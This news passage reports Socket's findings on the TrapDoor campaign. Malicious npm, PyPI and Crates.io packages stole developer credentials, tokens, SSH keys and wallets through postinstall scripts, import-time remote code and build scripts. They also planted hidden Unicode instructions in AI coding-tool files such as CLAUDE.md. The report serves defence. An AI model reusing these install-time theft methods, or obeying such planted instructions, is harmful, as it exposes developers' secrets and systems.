The packages were designed to steal developer secrets, including AWS credentials, GitHub tokens, SSH keys, browser data, environment variables, crypto wallets, and local development configuration files, according to Socket.
The findings indicate a bigger concern than just another malicious package incident. Developer environments increasingly sit at the intersection of source code, cloud infrastructure, CI/CD pipelines, AI coding tools, and privileged credentials. A compromise of one workstation can therefore give attackers a foothold beyond the developer’s machine.
The packages used execution points that are common in normal software development workflows. In npm, the malware relied on postinstall scripts. In PyPI, it used import-time execution to fetch and run remote JavaScript. In Crates.io, it abused Rust build scripts that execute during compilation. That makes the campaign harder to detect using controls focused on a single programming language or package registry.
TrapDoor also appears to reflect attackers’ growing interest in AI-assisted development environments. Socket said the campaign attempted to alter files used by AI coding tools, including .cursorrules and CLAUDE.md, using hidden Unicode instructions.
